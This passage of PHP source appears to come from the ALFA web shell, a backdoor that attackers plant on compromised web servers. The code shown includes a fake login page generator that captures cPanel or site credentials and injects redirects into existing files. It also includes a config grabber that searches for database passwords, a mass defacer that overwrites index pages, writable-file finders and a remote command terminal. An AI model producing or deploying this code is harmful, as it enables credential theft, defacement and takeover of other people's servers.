inline-block;width: 106px;">Bind on: </span><input size="50" type="text" name="bind_on" placeholder="eg: \'.$_SERVER["DOCUMENT_ROOT"].\'/wp-login.php"></div>\r\n\t<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Log To: </span><input size="50" type="text" name="logto" value="\'.$GLOBALS[\'cwd\'].\'logs.txt"></div>\r\n\t<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Count of Invalid login: </span><input size="20" type="text" name="count" value="3" style="text-align:center;"></div>\r\n\t<div style="text-align:center;"><input type="submit" name="btn" value=" "></div></div></form><br>\';\r\n\t$clone_page = $_POST[\'alfa1\'];\r\n\t$fake_root = $_POST[\'alfa2\'];\r\n\t$logto = $_POST[\'alfa4\'];\r\n\t$panel = $_POST[\'alfa5\'];\r\n\t$inject_to = $_POST[\'alfa6\'];\r\n\t$bind_on = $_POST[\'alfa7\'];\r\n\t$count = $_POST[\'alfa8\'];\r\n\tif(!empty($clone_page) && !empty($fake_root) && !empty($logto) && !empty($inject_to) && !empty($bind_on) && $_POST[\'alfa3\'] == \'>>\'){\r\n\t\techo __pre();\r\n\t\t$target = $clone_page;\r\n\t\t$curl = new AlfaCURL();\r\n\t\t$source_page = $curl->Send($target);\r\n\t\tif(!empty($source_page)){\r\n\t\t\t$matched_form = "";\r\n\t\t\tif($panel == "cpanel"){\r\n\t\t\t\tif(preg_match(\'#<form(.*)id="login_form"(.*)>#\', $source_page, $match)){\r\n\t\t\t\t\t$matched_form = $match[0];\r\n\t\t\t\t}\r\n\t\t\t}else{\r\n\t\t\t\tif(preg_match(\'#<form(.*?)>#\', $source_page, $match)){\r\n\t\t\t\t\t$matched_form = $match[0];\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tif(!empty($matched_form)){\r\n\t\t\t\t$fake = "";\r\n\t\t\t\t$pwd = str_replace($_SERVER["DOCUMENT_ROOT"], \'\', $fake_root);\r\n\t\t\t\t$uri = str_replace($_SERVER["DOCUMENT_ROOT"], \'\', $inject_to);\r\n\t\t\t\tif($panel == "cpanel"){\r\n\t\t\t\t\t$port = "2083";\r\n\t\t\t\t}else{\r\n\t\t\t\t\t$target = str_replace(array("http://", "https://"), "", $target);\r\n\t\t\t\t\t$port = explode(":",$target);\r\n\t\t\t\t\t$port = $port[1];\r\n\t\t\t\t}\r\n\t\t\t\tif(substr($uri, 0, 1) == "/"){\r\n\t\t\t\t\t$uri = substr($uri, 1);\r\n\t\t\t\t}\r\n\t\t\t\t$uri = $_SERVER["HTTP_ORIGIN"] . \'/\' . str_replace("index.php", "", $uri) . \'?:\' . $port;\r\n\t\t\t\t$log_url = $_SERVER["HTTP_ORIGIN"] . $pwd . \'/log.php\';\r\n\t\t\t\tif($panel == "cpanel"){\r\n\t\t\t\t\t$form = \'<form novalidate id="login_form" action="\'.$log_url.\'" method="post" target="_top" style="visibility:">\';\r\n\t\t\t\t}else{\r\n\t\t\t\t\t$form = \'<form action="\'.$log_url.\'" method="post">\';\r\n\t\t\t\t}\r\n\t\t\t\t$fake = str_replace($matched_form, $form, $source_page);\r\n\t\t\t\tif(@!is_dir($fake_root)){\r\n\t\t\t\t\t@mkdir($fake_root, 0777, true);\r\n\t\t\t\t}\r\n\r\n\t\t\t\t$cookie_name = "alfa_fakepage_counter" . rand(9999,99999);\r\n\r\n\t\t\t\t$post_user = \'user\';\r\n\t\t\t\t$post_pass = \'pass\';\r\n\t\t\t\t$resp_code = \'if(empty($user)){http_response_code(400);echo json_encode(array("message" => "no_username"));}else{http_response_code(401);}\';\r\n\t\t\t\tif($panel != "cpanel"){\r\n\t\t\t\t\t$post_user = \'username\';\r\n\t\t\t\t\t$post_pass = \'password\';\r\n\t\t\t\t\t$resp_code = \'@header("Location: ".$_SERVER[\\\'HTTP_REFERER\\\']);\';\r\n\t\t\t\t}\r\n\r\n\t\t\t\t$cpanel_log = \'<?php $cook_time = time()+(86400 * 7); $user = $_POST["\'.$post_user.\'"];$pass = $_POST["\'.$post_pass.\'"];if(!empty($user) && !empty($pass)){if(!isset($_COOKIE["\'.$cookie_name.\'"])){@setcookie("\'.$cookie_name.\'", 0, $cook_time, "/");$_COOKIE["\'.$cookie_name.\'"]=1;}if((int)$_COOKIE["\'.$cookie_name.\'"]>\'.$count.\'){@header("Location: /");exit;}@setcookie("\'.$cookie_name.\'", ((int)$_COOKIE["\'.$cookie_name.\'"] + 1), $cook_time, "/");$fp = @fopen("\'.$logto.\'", "a+");@fwrite($fp, $user . " : " . $pass . "\\n");fclose($fp);sleep(3);\'.$resp_code.\'exit;}?>\';\r\n\r\n\t\t\t\t@file_put_contents($fake_root.\'/log.php\', $cpanel_log);\r\n\r\n\t\t\t\tif($panel == "cpanel"){\r\n\t\t\t\t\t$fake = preg_replace(array(\'#<link(.*)href="(.*)"(.*)>#\', \'#<img class="main-logo" src="(.*)"(.*)>#\', \'# <a(.*)id="reset_password">#\'), array(\'<link href="\'.$target.\'/$2">\', \'<img class="main-logo" src="\'.$target.\'/$1" alt="logo" />\', \'<a href="#" id="reset_password">\'), $fake);\r\n\t\t\t\t}\r\n\r\n\t\t\t\t@file_put_contents($fake_root.\'/index.php\', $fake);\r\n\r\n\t\t\t\t$inject_code = \'<?php if(isset($_GET[":2083"])&&(int)$_COOKIE["\'.$cookie_name.\'"]<\'.$count.\'){@include("\'.$fake_root.\'/index.php");exit;}?>\';\r\n\t\t\t\t$bind_on_code = \'<?php if((int)$_COOKIE["\'.$cookie_name.\'"]<\'.$count.\'){@header("Location: \'.$uri.\'");exit;}?>\';\r\n\r\n\t\t\t\t@file_put_contents($inject_to, $inject_code . "\\n" .@file_get_contents($inject_to));\r\n\t\t\t\t@file_put_contents($bind_on, $bind_on_code . "\\n" .@file_get_contents($bind_on));\r\n\r\n\t\t\t\techo "success...!";\r\n\t\t\t}else{\r\n\t\t\t\techo "failed...!";\r\n\t\t\t}\r\n\t\t}else{\r\n\t\t\techo("<div style=\'text-align:center;color:red;\'>Cannot open the target...!</div>");\r\n\t\t}\r\n\t}\r\n\techo \'</div>\';\r\n\talfafooter();\r\n}\r\nfunction alfaarchive_manager(){\r\n\talfahead();\r\n\t$file = $_POST[\'alfa2\'];\r\n\tif(!file_exists($file)){\r\n\t\t$file = $GLOBALS[\'cwd\'];\r\n\t}\r\n\t$rand_id = rand(9999, 999999);\r\n\techo \'<div class=header><center><p><div class="txtfont_header">| Archive Manager |</div></p>\';\r\n\techo \'<form name="srch" onSubmit="g(\\\'archive_manager\\\',null,null,this.file.value,null,null,\\\'>>\\\');return false;" method=\\\'post\\\'>\r\n\t<div class="txtfont">\r\n\tArchive file: <input size="50" id="target" type="text" name="file" value="\'.$file.\'">\r\n\t<input type="submit" name="btn" value=" "></div></form></center><br>\';\r\n\tif($_POST[\'alfa5\']==\'>>\'){\r\n\t\t//echo __pre();\r\n\t\techo \'<hr><div style="margin-left: 12px;" archive_full="phar://\'.$file.\'" archive_name="\'.basename($file).\'" id="archive_dir_\'.$rand_id.\'" class="archive_dir_holder"><span>PWD: </span><div class="archive_pwd_holder" style="display:inline-block"><a>/</a></div></div>\';\r\n\t\techo \'<div style="padding: 10px;" id="archive_base_\'.$rand_id.\'">\';\r\n\t\t__alfa_open_archive_file($file, $rand_id);\r\n\t\techo \'</div>\';\r\n\t}\r\n\techo \'</div>\';\r\n\talfafooter();\r\n}\r\nfunction __alfa_open_archive_file($arch, $base_id=0){\r\n\ttry{\r\n\t\t$files = array();\r\n\t\t$dirs = array();\r\n\t\t$archive = new PharData($arch);\r\n\t\t foreach($archive as $file) {\r\n\t\t\t $file_modify = @date(\'Y-m-d H:i:s\', @filemtime($file->getPathname()));\r\n\t\t     if($file->isDir()) {\r\n\t\t\t\t $dirs[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "dir", "modify" => $file_modify);\r\n\t\t     }else{\r\n\t\t\t\t $file_size = @filesize($file->getPathname());\r\n\t\t\t\t $files[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "file",  "modify" => $file_modify, "size" => $file_size);\r\n\t\t\t }\r\n\t\t }\r\n\t\t function __alfa_open_archive_usort($a, $b){\r\n\t\t\t return strcmp(strtolower($a[\'name\']), strtolower($b[\'name\']))*1;\r\n\t\t }\r\n\t\t usort($dirs, "__alfa_open_archive_usort");\r\n\t\t usort($files, "__alfa_open_archive_usort");\r\n\t\t $files = array_merge($dirs, $files);\r\n\t\t echo \'<table width="100%" class="main" cellspacing="0" cellpadding="2"><tbody><tr><th>Name</th><th>Size</th><th>Modify</th><th>Actions</th></tr>\';\r\n\t\t $icon = \'<img class="archive-icons" src="\'.findicon(\'..\',\'dir\').\'" width="30" height="30">\';\r\n\t\t echo \'<tr><th><a base_id="\'.$base_id.\'" class="archive-file-row" fname=".." onclick="alfaOpenArchive(this);" path="\'.dirname($arch.\'.php\').\'">\'.$icon.\'<span class="archive-name archive-type-dir">| .. |</span></a><td>dir</td><td>-</td><td>-</td></tr>\';\r\n\t\t foreach($files as $file){\r\n\t\t\t $icon = \'<img class="archive-icons" src="\'.findicon($file[\'name\'],$file[\'type\']).\'" width="30" height="30">\';\r\n\t\t\t if($file["type"] == "dir"){\r\n\t\t\t \techo \'<tr><th><a base_id="\'.$base_id.\'" class="archive-file-row" onclick="alfaOpenArchive(this);" path="\'.$file["path"].\'" fname="\'.$file["name"].\'">\'.$icon.\'<span class="archive-name archive-type-dir">| \'.$file["name"].\' |</span></a><td>dir</td><td>\'.$file["modify"].\'</td><td>-</td></tr>\';\r\n\t\t \t}else{\r\n\t\t\t\techo "<tr><th><a base_id=\'".$base_id."\' class=\'archive-file-row\' onclick=\\"editor(\'".$file["path"]."\',\'auto\',\'\',\'\',\'\',\'file\');\\">".$icon."<span class=\'archive-name archive-type-file\' fname=\'".$file["name"]."\'>".$file["name"]."</span></a><td>".alfaSize($file["size"])."</td><td>".$file["modify"]."</td><td>-</td></tr>";\r\n\r\n\t\t\t}\r\n\t\t }\r\n\t\t  echo \'</table>\';\r\n\t}catch(Exception $e){\r\n\t\techo("0");\r\n\t}\r\n}\r\nfunction alfaopen_archive_dir(){\r\n\t$dir = $_POST["alfa1"];\r\n\t$base_id = $_POST["alfa2"];\r\n\t__alfa_open_archive_file($dir, $base_id);\r\n}\r\nfunction alfaconfig_grabber(){\r\n\talfahead();\r\n\techo \'<div class=header><center><p><div class="txtfont_header">| Config Grabber |</div></p>\';\r\n\techo \'<form name="srch" onSubmit="g(\\\'config_grabber\\\',null,null,this.dir.value,this.ext.value,null,\\\'>>\\\');return false;" method=\\\'post\\\'>\r\n\t<div class="txtfont">\r\n\tDir: <input size="50" id="target" type="text" name="dir" value="\'.$GLOBALS[\'cwd\'].\'">\r\n\tExt: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">\r\n\t<input type="submit" name="btn" value=" "></div></form></center><br>\';\r\n\t$dir = $_POST[\'alfa2\'];\r\n\t$ext = $_POST[\'alfa3\'];\r\n\tif($_POST[\'alfa5\']==\'>>\'){\r\n\t\techo __pre();\r\n\t\tAlfa_ConfigGrabber($dir, $ext);\r\n\t}\r\n\techo \'</div>\';\r\n\talfafooter();\r\n}\r\nfunction Alfa_ConfigGrabber($dir, $ext) {\r\n\t$pattern = "#define[ ]{0,}\\([ ]{0,}(?:\'|\\")DB_HOST(?:\'|\\")[ ]{0,}|define[ ]{0,}\\([ ]{0,}(?:\'|\\")DB_HOSTNAME(?:\'|\\")[ ]{0,}|config\\[(?:\'|\\")MasterServer(?:\'|\\")\\]\\[(?:\'|\\")password(?:\'|\\")\\]|(?:\'|\\")database(?:\'|\\")[ ]{0,}=>[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")|(?:\'|\\")(mysql|database)(?:\'|\\")[ ]{0,}=>[ ]{0,}array|db_name|db_user|db_pass|db_server|db_host|dbhost|dbname|dbuser|dbpass|database_name|database_user|database_pass|mysql_user|mysql_pass|mysqli_connect|mysql_connect|new[ ]{0,}mysqli#i";\r\n\t$db_files = array("wp-config.php","configure.php","config.inc.php","configuration.php","config.php","conf.php","dbclass.php","class_core.php","dist-configure.php", "settings.php", "conf_global.php", "db.php", "connect.php", "confing.db.php", "config.db.php", "database.php");\r\n\tif(@is_readable($dir)){\r\n\t\t$globFiles = @glob("$dir/*.$ext");\r\n\t\t$globDirs  = @glob("$dir/*", GLOB_ONLYDIR);\r\n\t\t$blacklist = array();\r\n\t\tforeach ($globDirs as $dir) {\r\n\t\t\tif(!@is_readable($dir)||@is_link($dir)) continue;\r\n\t\t\t@Alfa_ConfigGrabber($dir, $ext);\r\n\t\t}\r\n\t\tforeach ($globFiles as $file){\r\n\t\t\t$filee = @file_get_contents($file);\r\n\t\t\tif(preg_match($pattern, $filee)){\r\n\t\t\t\techo "<div><span>$file</span> <a style=\'cursor:pointer;\' onclick=\\"editor(\'".$file."\',\'auto\',\'\',\'\',\'\',\'file\');\\">[ View file ]</a></div>";\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\nfunction alfasearcher(){\r\nalfahead();\r\necho \'<div class=header><center><p><div class="txtfont_header">| Searcher |</div></p><h3><a href=javascript:void(0) onclick="g(\\\'searcher\\\',null,\\\'file\\\')">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick="g(\\\'searcher\\\',null,\\\'str\\\')">| Find Files By Name | </a></h3></center>\';\r\nif(isset($_POST[\'alfa1\'])&&$_POST[\'alfa1\']==\'file\'){\r\necho \'<center><div class="txtfont_header">| Find Readable Or Writable Files  |</div><br><br><form name="srch" onSubmit="g(\\\'searcher\\\',null,\\\'file\\\',this.filename.value,this.ext.value,this.method.value,\\\'>>\\\');return false;" method=\\\'post\\\'>\r\n<div class="txtfont">\r\nMethod: <select style="width: 18%;" onclick="alfa_searcher_tool(this.value);" name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>\r\nDir: <input size="50" id="target" type="text" name="filename" value="\'.$GLOBALS[\'cwd\'].\'">\r\nExt: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">\r\n<input type="submit" name="btn" value=" "></div></form></center><br>\';\r\n$dir = $_POST[\'alfa2\'];\r\n$ext = $_POST[\'alfa3\'];\r\n$method = $_POST[\'alfa4\'];\r\nif($_POST[\'alfa5\']==\'>>\'){\r\necho __pre();\r\nif(substr($dir,-1)==\'/\')$dir=substr($dir,0,-1);\r\nAlfa_Searcher($dir,trim($ext),$method);\r\n}\r\n}\r\nif($_POST[\'alfa1\']==\'str\'){\r\necho \'<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g(\\\'searcher\\\',null,\\\'str\\\',this.dir.value,this.string.value,\\\'>>\\\',this.ext.value,this.method.value);return false;" method=\\\'post\\\'>\r\n<div class="txtfont">\r\nMethod: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>\r\nString: <input type="text" name="string" value="">\r\nDir: <input size="50" type="text" name="dir" value="\'.$GLOBALS[\'cwd\'].\'">\r\nExt: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">\r\n<input type="submit" name="btn" value=" "></div></form></center><br>\';\r\n$dir = $_POST[\'alfa2\'];\r\n$string = $_POST[\'alfa3\'];\r\n$ext = $_POST[\'alfa5\'];\r\nif(!empty($string) AND !empty($dir) AND $_POST[\'alfa4\'] == \'>>\'){\r\necho __pre();\r\nAlfa_StrSearcher($dir,$string,$ext,$_POST[\'alfa6\']);\r\n}\r\n}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction alfaMassDefacer(){\r\nalfahead();\r\nAlfaNum(5,6,7,8,9,10);\r\necho "<div class=header><center><p><div class=\'txtfont_header\'>| Mass Defacer |</div></p><form onSubmit=\\"g(\'MassDefacer\',null,this.massdir.value,this.defpage.value,this.method.value,\'>>\');return false;\\" method=\'post\'>";\r\necho \'<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>\r\n\tMass dir: <input size="50" id="target" type="text" name="massdir" value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n\tDefPage: <input size="50" type="text" name="defpage" value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'"></div> <input type="submit" name="btn" value=" "></center></p>\r\n</form>\';\r\n$dir = $_POST[\'alfa1\'];\r\n$defpage = $_POST[\'alfa2\'];\r\n$method = $_POST[\'alfa3\'];\r\n$fCurrent = $GLOBALS[\'__file_path\'];\r\nif($_POST[\'alfa4\'] == \'>>\'){\r\nif(!empty($dir)){\r\nif(@is_dir($dir)){\r\nif(@is_readable($dir)){\r\nif(@is_file($defpage)){\r\nif($dh = @opendir($dir)){\r\necho __pre();\r\nwhile (($file = @readdir($dh)) !== false){\r\nif($file == \'..\' || $file == \'.\')continue;\r\n$newfile=$dir.$file;\r\nif($fCurrent == $newfile)continue;\r\nif(@is_dir($newfile)){\r\nAlfa_ReadDir($newfile,$method,$defpage);\r\n}else{\r\nif(!@is_writable($newfile))continue;\r\nif(!@is_readable($newfile))continue;\r\nAlfa_Rewriter($newfile,$file,$defpage,$method);\r\n}\r\n}\r\nclosedir($dh);\r\n}else{__alert(\'<font color="red">Error In OpenDir...</font>\');}\r\n}else{__alert(\'<font color="red">DefPage File NotFound...</font>\');}\r\n}else{__alert(\'<font color="red">Directory is not Readable...</font>\');}\r\n}else{__alert(\'<font color="red">Mass Dir is Invalid Dir...</font>\');}\r\n}else{__alert(\'<font color="red">Dir is Empty...</font>\');}\r\n}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction Alfa_ReadDir($dir,$method=\'\',$defpage=\'\'){\r\nif(!@is_readable($dir)) return false;\r\nif (@is_dir($dir)) {\r\nif ($dh = @opendir($dir)) {\r\nwhile(($file=readdir($dh))!==false) {\r\nif($file == \'..\' || $file == \'.\')continue;\r\n$newfile=$dir.\'/\'.$file;\r\nif(@is_readable($newfile)&&@is_dir($newfile))Alfa_ReadDir($newfile,$method,$defpage);\r\nif(@is_file($newfile)){\r\nif(!@is_readable($newfile))continue;\r\nAlfa_Rewriter($newfile,$file,$defpage,$method);\r\n}\r\n}\r\nclosedir($dh);\r\n}\r\n}\r\n}\r\nfunction Alfa_Rewriter($dir,$file,$defpage,$m=\'index\'){\r\nif(!@is_writable($dir)) return false;\r\nif(!@is_readable($dir)) return false;\r\n$defpage=@file_get_contents($defpage);\r\nif($m == \'index\'){\r\n$indexs = array(\'index.php\',\'index.htm\',\'index.html\',\'default.asp\',\'default.aspx\',\'index.asp\',\'index.aspx\',\'index.js\');\r\nif(in_array(strtolower($file),$indexs)){\r\n@file_put_contents($dir,$defpage);\r\necho @is_file($dir)?$dir."<b><font color=\'red\'>DeFaced...</b></font><br>" : \'\';\r\n}\r\n}elseif($m==\'all\'){\r\n@file_put_contents($dir,$defpage);\r\necho @is_file($dir)?$dir."  <b><font color=\'red\'>DeFaced...</b></font><br>" : \'\';\r\n}\r\n}\r\nfunction alfaGetDisFunc(){\r\nalfahead();\r\necho \'<div class="header">\';\r\n$disfun = @ini_get(\'disable_functions\');\r\n$s = explode(\',\',$disfun);\r\n$f = array_unique($s);\r\necho \'<center><br><b><font color="#7CFC00">Disable Functions</font></b><pre><table border="1"><tr><td align="center" style="background-color: green;color: white;width:5%">#</td><td align="center" style="background-color: green;color: white;">Func Name</td></tr>\';\r\n$i=1;\r\nforeach($f as $s){\r\n$s=trim($s);\r\nif(function_exists($s)||!is_callable($s))continue;\r\necho \'<tr><td align="center" style="background-color: black;">\'.$i.\'</td>\';\r\necho \'<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function.\'.str_replace(\'_\',\'-\',$s).\'.php"><span class="disable_functions"><b>\'.$s.\'</b></span></a></td>\';\r\n$i++;\r\n}\r\necho \'</table></center>\';\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction Alfa_Create_A_Tag($action,$vals){\r\n$nulls = array();\r\nforeach($vals as $key => $val){\r\necho \'<a href=javascript:void(0) onclick="g(\\\'\'.$action.\'\\\',\';\r\nfor($i=1;$i<=$val[1]-1;$i++)$nulls[] = \'null\';\r\n$f = implode(\',\',$nulls);\r\necho $f.\',\\\'\'.$val[0].\'\\\');return false;">| \'.$key.\' | </a>\';\r\nunset($nulls);\r\n}\r\n}\r\nfunction Alfa_Searcher($dir, $ext, $method) {\r\nif(@is_readable($dir)){\r\nif($method == \'all\')$ext = \'*\';\r\nif($method == \'dirs\')$ext = \'*\';\r\n$globFiles = @glob("$dir/*.$ext");\r\n$globDirs  = @glob("$dir/*", GLOB_ONLYDIR);\r\n$blacklist = array();\r\nforeach ($globDirs as $dir) {\r\nif(!@is_readable($dir)||@is_link($dir)) continue;\r\n@Alfa_Searcher($dir, $ext, $method);\r\n}\r\nswitch($method){\r\ncase "files":\r\nforeach ($globFiles as $file){\r\nif(@is_writable($file)){\r\necho "$file<br>";\r\n}\r\n}\r\nbreak;\r\ncase "dirs":\r\nforeach ($globFiles as $file){\r\nif(@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)){\r\necho dirname($file).\'<br>\';\r\n$blacklist[] = dirname($file);\r\n}\r\n}\r\nbreak;\r\ncase "all":\r\nforeach ($globFiles as $file){\r\necho $file.\'<br>\';\r\n}\r\nbreak;\r\n}\r\nunset($blacklist);\r\n}\r\n}\r\nfunction AlfaiFrameCreator($f,$width=\'100%\',$height=\'600px\'){\r\nreturn(\'<iframe src="\'.__ALFA_DATA_FOLDER__."/".$f.\'" width="\'.$width.\'" height="\'.$height.\'" frameborder="0"></iframe>\');\r\n}\r\nclass AlfaCURL {\r\npublic $headers;\r\npublic $user_agent;\r\npublic $compression;\r\npublic $cookie_file;\r\npublic $proxy;\r\npublic $path;\r\npublic $ssl = true;\r\npublic $curl_status = true;\r\nfunction __construct($cookies=false,$compression=\'gzip\',$proxy=\'\'){\r\nif(!extension_loaded(\'curl\')){$curl_status = false;return false;}\r\n$this->headers[] = \'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg\';\r\n$this->headers[] = \'Connection: Keep-Alive\';\r\n$this->headers[] = \'Content-type: application/x-www-form-urlencoded;charset=UTF-8\';\r\n$this->user_agent = \'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36)\';\r\n$this->path = ALFA_TEMPDIR.\'/Alfa_cookies.txt\';\r\n$this->compression=$compression;\r\n$this->proxy=$proxy;\r\n$this->cookies=$cookies;\r\nif($this->cookies)$this->cookie($this->path);\r\n}\r\nfunction cookie($cookie_file) {\r\nif (_alfa_file_exists($cookie_file,false)) {\r\n$this->cookie_file=$cookie_file;\r\n}else{\r\n@fopen($cookie_file,\'w\') or die($this->error(\'The cookie file could not be opened.\'));\r\n$this->cookie_file=$cookie_file;\r\n@fclose($this->cookie_file);\r\n}\r\n}\r\nfunction Send($url,$method="get",$data=""){\r\nif(!$this->curl_status){return false;}\r\n$process = curl_init($url);\r\ncurl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);\r\ncurl_setopt($process, CURLOPT_HEADER, 0);\r\ncurl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);\r\ncurl_setopt($process, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($process, CURLOPT_ENCODING , $this->compression);\r\ncurl_setopt($process, CURLOPT_TIMEOUT, 30);\r\nif($this->ssl){\r\ncurl_setopt($process, CURLOPT_SSL_VERIFYPEER ,false);\r\ncurl_setopt($process, CURLOPT_SSL_VERIFYHOST,false);\r\n}\r\nif($this->cookies){\r\ncurl_setopt($process, CURLOPT_COOKIEFILE, $this->path);\r\ncurl_setopt($process, CURLOPT_COOKIEJAR, $this->path);\r\n}\r\nif($this->proxy){\r\ncurl_setopt($process, CURLOPT_PROXY, $this->proxy);\r\n}\r\nif($method==\'post\'){\r\ncurl_setopt($process, CURLOPT_POSTFIELDS, $data);\r\ncurl_setopt($process, CURLOPT_POST, 1);\r\ncurl_setopt($process, CURLOPT_HTTPHEADER, array(\'Content-Type: application/x-www-form-urlencoded\'));\r\n}\r\n$return = @curl_exec($process);\r\ncurl_close($process);\r\nreturn $return;\r\n}\r\nfunction error($error) {\r\necho "<center><div style=\'width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px\'><b>cURL Error</b><br>$error</div></center>";\r\ndie;\r\n}\r\n}\r\nfunction getConfigHtml($cms){\r\n$content = \'\';\r\n$cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke","phpbb"=>"PHPBB","mybb"=>"MyBB","drupal"=>"Drupal","smf"=>"SMF");\r\n$content .= "<form class=\'getconfig\' onSubmit=\'g(\\"GetConfig\\",null,this.cms.value,this.path.value,this.getAttribute(\\"base_id\\"));return false;\'><div class=\'txtfont\'>Cms: </div> <select name=\'cms\'style=\'width:100px;\'>";\r\nforeach($cms_array as $key => $val){\r\n$content .= "<option value=\'{$key}\' ".($key==$cms?\'selected=selected\':\'\').">{$val}</option>";\r\n}\r\n$content .= "</select> <div class=\'txtfont\'>Path(installed cms/Config): </div> <input type=\'text\' name=\'path\' value=\'".$_SERVER[\'DOCUMENT_ROOT\']."/\' size=\'30\' /> <button class=\'button\'>GetConfig</button>";\r\n$content .= "</form>";\r\nreturn $content;\r\n}\r\nif (!function_exists(\'json_encode\')){\r\n    function json_encode($a=false){\r\n        if (is_null($a)) return \'null\';\r\n        if ($a === false) return \'false\';\r\n        if ($a === true) return \'true\';\r\n        if (is_scalar($a))\r\n        {\r\n            if (is_float($a))\r\n            {\r\n                return floatval(str_replace(",", ".", strval($a)));\r\n            }\r\n\r\n            if (is_string($a))\r\n            {\r\n                static $jsonReplaces = array(array("\\\\", "/", "\\n", "\\t", "\\r", "\\b", "\\f", \'"\'), array(\'\\\\\\\\\', \'\\\\/\', \'\\\\n\', \'\\\\t\', \'\\\\r\', \'\\\\b\', \'\\\\f\', \'\\"\'));\r\n                return \'"\' . str_replace($jsonReplaces[0], $jsonReplaces[1], $a) . \'"\';\r\n            }\r\n            else\r\n            return $a;\r\n        }\r\n        $isList = true;\r\n        for ($i = 0, reset($a); $i < count($a); $i++, next($a))\r\n        {\r\n            if (key($a) !== $i)\r\n            {\r\n                $isList = false;\r\n                break;\r\n            }\r\n        }\r\n        $result = array();\r\n        if ($isList)\r\n        {\r\n            foreach ($a as $v) $result[] = json_encode($v);\r\n            return \'[\' . join(\',\', $result) . \']\';\r\n        }\r\n        else\r\n        {\r\n            foreach ($a as $k => $v) $result[] = json_encode($k).\':\'.json_encode($v);\r\n            return \'{\' . join(\',\', $result) . \'}\';\r\n        }\r\n    }\r\n}\r\nif ( !function_exists(\'json_decode\') ){\r\nfunction json_decode($json, $array=true){\r\n    $comment = false;\r\n    $out = \'$x=\';\r\n    for ($i=0; $i<strlen($json); $i++)\r\n    {\r\n        if (!$comment)\r\n        {\r\n            if ($json[$i] == \'{\' || $json[$i] == \'[\'){$out .= \' array(\';}\r\n            else if ($json[$i] == \'}\' || $json[$i] == \']\'){$out .= \')\';}\r\n            else if ($json[$i] == \':\'){$out .= \'=>\';}\r\n            else {$out .= $json[$i];}\r\n        }\r\n        else $out .= $json[$i];\r\n        if ($json[$i] == \'"\')    $comment = !$comment;\r\n    }\r\n    eval($out . \';\');\r\n    return $x;\r\n}\r\n}\r\nfunction alfaterminalExec(){\r\n\t$pwd = "pwd";\r\n\t$seperator = ";";\r\n\tif($GLOBALS[\'sys\']!=\'unix\'){\r\n\t\t$pwd = "cd";\r\n\t\t$seperator = "&";\r\n\t}\r\n\tif($GLOBALS["glob_chdir_false"]&&!empty($_POST["c"])){$cmd = "cd \'".addslashes($_POST["c"])."\'".$seperator;}\r\n\t$current_path = \'\';\r\n\tif(preg_match("/cd[ ]{0,}(.*)[ ]{0,}".$seperator."|cd[ ]{0,}(.*)[ ]{0,}/i", $_POST[\'alfa1\'], $match)){\r\n\t\tif(empty($match[1])){\r\n\t\t\t$match[1] = $match[2];\r\n\t\t}\r\n\t\t$current_path = alfaEx("cd ".addslashes($match[1]).$seperator.$pwd);\r\n\t\t$current_path = str_replace("\\\\", "/", $current_path);\r\n\t}\r\n\t$out = alfaEx($cmd.$_POST[\'alfa1\'], true);\r\n\t$out = htmlspecialchars($out);\r\n\techo json_encode(array("output" => convertBash($out), "path" => $current_path));\r\n}\r\nfunction convertBash($code) {\r\n    $dictionary = array(\r\n        \'[01;30m\' => \'<span style="color:black">\',\r\n        \'[01;31m\' => \'<span style="color:red">\',\r\n        \'[01;32m\' => \'<span style="color:green">\',\r\n        \'[01;33m\' => \'<span style="color:yellow">\',\r\n        \'[01;34m\' => \'<span style="color:blue">\',\r\n        \'[01;35m\' => \'<span style="color:purple">\',\r\n        \'[01;36m\' => \'<span style="color:cyan">\',\r\n        \'[01;37m\' => \'<span style="color:white">\',\r\n        \'[0m\'   => \'</span>\'\r\n    );\r\n    $htmlString = str_replace(array_keys($dictionary), $dictionary, $code);\r\n    return $htmlString;\r\n}\r\nfunction alfadoActions(){\r\n\t$chdir_fals = false;\r\n\tif(!@chdir($_POST[\'c\'])){\r\n\t\t$chdir_fals = true;\r\n\t\t$alfa_canruncmd = _alfa_can_runCommand(true,true);\r\n\t}\r\n\tif(isset($_POST[\'alfa1\']))$_POST[\'alfa1\'] = rawurldecode($_POST[\'alfa1\']);\r\n\tif(isset($_POST[\'alfa2\']))$_POST[\'alfa2\'] = 